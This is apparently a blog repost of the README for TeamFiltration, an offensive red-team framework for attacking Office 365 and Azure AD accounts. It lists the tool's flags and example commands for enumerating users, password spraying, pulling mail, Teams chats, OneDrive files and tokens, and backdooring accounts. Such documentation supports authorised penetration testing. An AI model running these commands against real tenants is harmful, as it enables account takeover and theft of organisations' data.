Site icon API Security Blog

TeamFiltration – Cross-Platform Framework For Enumerating, Spraying, Exfiltrating, And Backdooring O365 AAD Accounts

[![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVHagwDgVhZp53WwG_gFmIQMRv_3tyd7uC75ba026ZOoy2gPWiQffdIRRhgUE-eS1JOHe4X6699mSkR1MtiSIOW8lPQx4vt3ZHcQhLsZ8jITXN1eLAlO3W14YHnvwAN2X1jGTbHIXGMoIlGXGBlbXNwxobEKHGcIDx-aJ58bW0YTdWIGSaKfuqPW7TMA/w640-h559/family-of-client-ids-research.png)]()

TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and [backdooring]( “backdooring” ) O365 AAD accounts. See the [TeamFiltration]( “TeamFiltration” ) wiki page for an introduction into how TeamFiltration works and the [Quick Start Guide]( “Quick Start Guide” ) for how to get up and running!

This tool has been used internally since January 2021 and was publicly released in my talk “Taking a Dumb In The Cloud” during DefCON30.

## Download

[You can download the latest precompiled release for Linux, Windows and MacOSX X64 ]( “You can download the latest precompiled release for Linux, Windows and MacOSX X64” )

**The releases are precompiled into a single application-dependent binary. The size go up, but you do not need DotNetCore or any other dependencies to run them.**

## Usage

╓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╖
╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬
╬╬╬╬┤ ╟╬╬╜╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬
╬╬╬╬╡ │ ╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬
╬╬╬╬╡ ││ ╙╬╬╜╘ └╙╜╬╬╬╬╬╬
╬╬╬╬╡ ╓╥╥╬╬╬╬╬╬╥╥╖ ││ │ ╬╬╬╬╬
╬╬╬╬╡ ╓╬╫╬╜╜┘ ╙╜╜╬╫╬┐ ││ ││ └╬╬╬╬
╬╬╬╬┤ ╬╬╜╙╩╬╖╓ ╙╬╬╬ ││ ││ ╬╬╬╬
╬╬╬╬┤ ╬╜ ╙╬╫╖╖ ╓ ╙╬╖ ││ ├││ ╬╬╬╬
╬╬╬╬┤ ╬╬ ╓╖ ╙╬╬╬╬╬╬╦ ╬╬ │┌ ╓╬┤││ ╓╬╬╬╬
╬╬╬╬┤ ╓╬┤ ╬╬╬ ╬╬╬╬╬╬╬╬╜╜╜╬╬╖ ╟╬╬╬╬╬╬╬╬╬╕ ┌╬╬╬╬╬
╬╬╬╬┤ ╬╬┤ ╙╩┘ ╙╬╬╬╬╬╩ ╟╬╬ ╙╜╜╜╜╜╜╜╜╜╬╬╖╖╖╦╬╬╬╬╬╬╬
╬╬╬╬┤ ╬╬┤ ╟╬╬ ││ ╬╬╬╬╬╬╬╬╬╬╬╬
╬╬╬╬┤ ╬╬ ╦╖ ╗╖ ╬╬ ││ │ ╬╬╬╬
╬╬╬╬┤ └╬┐ ╙╬╖╖ ╓╬╬╜ ╓╬┘ ││ │ ╬╬╬╬
╬╬╬╬┤ └╬╖ ╙╩╨╬╬╬╩╨╜╜ ╒╬╬ ││ │ ╬╬╬╬
╬╬╬╬┤ ╙╬╬╬╖ ┌╖╫╬╜┘ ││ │ ╬╬╬╬
╬╬╬╬┤ ╙╩╬╬╬╥╥╥╥╥╥╫╬╬╜╜ ││ │ ╬╬╬╬
╬╬╬╬┤ ╙╙╜╜╜╛ ││ │ ╬╬╬╬
╬╬╬╬┤ ││ │ ╓╖╬╬╬╬╬
╬╬╬╬┤ ││ ╬╦╦╬╬╬╬╬╬╬╬╬
╬╬╬╬┤ ││ ╓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬
╬╬╬╬┤ ╬╬╬╖╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬
╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬
└╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╜
╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜

[�] TeamFiltration V0.3.3.7 PUBLIC, created by @Flangvik @TrustedSec
Usage:

–outpath Output path to store database and exfiltrated information (Needed for all modules)

–config Local path to your TeamFiltration.json configuration file, if not provided will load from the current path

–exfil Load the [exfiltration]( “exfiltration” ) module

–username Override to target a given username that does not exist in the database
–password Override to target a given password that does not exist in the database
–cookie-dump Override to target a given account using it’s refresk-cookie-collection

–all Exfiltrate information from ALL SSO resources (Graph, OWA, SharePoint, OneDrive, Teams)
–aad Exfiltrate information from Graph API (domain users and groups)
–teams Exfiltrate information from Teams API (files, chatlogs, attachments, contactlist)
–onedrive Exfiltrate information from OneDrive/SharePoint API (accessible SharePoint files and the users entire OneDrive directory)
–owa Exfiltrate information from the Outlook REST API ( The last 2k emails, both sent and received)
–owa-limit Set the max amount of emails to exfiltrate, default is 2k.
–jwt-tokens Exfiltrate JSON formated JTW-tokens for SSO resources (MsGraph,AdGraph, Outlook, SharePoint, OneDrive, Teams)

–spray Load the spraying module

–aad-sso Use SecureWorks recent [Azure Active Directory]( “Azure Active Directory” ) password brute-forcing vuln for spraying
–us-cloud When spraying companies attached to US Tenants (https://login.microsoftonline.us/)
–time-window Defines a time windows where spraying should accour, in the military time format
–passwords Path to a list of passwords, common weak-passwords will be generated if not supplied
–seasons-only Password generated for spraying will only be based on seasons
–months-only Password generated for spraying will only be based on months
–common-only Spray with the top 20 most common passwords
–combo Path to a combolist of username:password
–exclude Path to a list of emails to exclude from spraying

–sleep-min Minimum minutes to sleep between each full rotation of spraying default=60
–sleep-max Maximum minutes to sleep between each full rotation of spraying default=100
–delay Delay in seconds between each individual [authentication]( “authentication” ) attempt. default=0
–push Get Pushover notifications when valid credentials are found (requires pushover keys in config)
–push-lo cked Get Pushover notifications when an sprayed account gets locked (requires pushover keys in config)
–force Force the spraying to proceed even if there is less the time since the last attempt

–enum Load the enumeration module

–domain Domain to perfom enumeration against, names pulled from statistically-likely-usernames if not provided with –usernames
–usernames Path to a list of usernames to enumerate (emails)
–dehashed Use the dehashed submodule in order to enumerate emails from a basedomain
–validate-msol Validate that the given o365 accounts exists using the public GetCredentialType method (Very RateLimited – Slow 20 e/s)
–validate-teams Validate that the given o365 accounts exists using the Teams API method (Recommended – Super Fast 300 e/s)
–validate-login Validate that the given o365 accounts by attemping to login (Noisy – triggers logins – Fast 100 e/s)

–backdoor Loads the interactive backdoor module

–database Loads the interactive database browser module

–debug Add burp as a proxy on 127.0.0.1:8080

Examples:

–outpath C:Clients2021FooBarTFOutput –config myCustomConfig.json –spray –sleep-min 120 –sleep-max 200 –push
–outpath C:Clients2021FooBarTFOutput –config myCustomConfig.json –spray –push-locked –months-only –exclude C:Clients2021FooBarExclude_Emails.txt
–outpath C:Clients2021FooBarTFOutput –config myCustomConfig.json –spray –passwords C:Clients2021FooBarGenericPasswords.txt –time-window 13:00-22:00
–outpath C:Clients2021FooBarTFOutput –config myCustomConfig.json –exfil –all
–outpath C:Clients2021FooBarTFOutput –config myCustomConfig.json –exfil –aad
–outpath C:Clients2021FooBarTFOutput –config myCustomConfig.json –exfil –teams –owa –owa-limit 5000
–outpath C:Clients2021FooBarTFOutput –config myCustomConfig.json –debug –exfil –onedrive
–outpath C:Clients2021FooBarTFOutput –config myCustomConfig.json –enum –validate-teams
–outpath C:Clients2021FooBarTFOutput –config myCustomConfig.json –enum –validate-msol –usernames C:Clients2021FooBarOSINTUsernames.txt
–outpath C:Clients2021FooBarTFOutput –config myCustomConfig.json –backdoor
–outpath C:Clients2021FooBarTFOutput –config myCustomConfig.json –database

## Credits

* [GitHub – KoenZomers/OneDriveAPI: API in .NET to communicate with OneDrive Personal and OneDrive for Business]( “GitHub – KoenZomers/OneDriveAPI: API in .NET to communicate with OneDrive Personal and OneDrive for Business” )
* [Research into Undocumented Behavior of Azure AD Refresh Tokens ]( “Research into Undocumented Behavior of Azure AD Refresh Tokens” )
* [WS API Gateway management tool for creating on the fly HTTP pass-through proxies for unique IP rotation]( “WS API Gateway management tool for creating on the fly HTTP pass-through proxies for unique IP rotation” )
* Credits to [Ryan] () for validating and discussing my observations / questions!
* The entire [TrustedSec]( “TrustedSec” ) team for helping me polish this tool!

**[Download TeamFiltration]( “Download TeamFiltration” )**Read More

Exit mobile version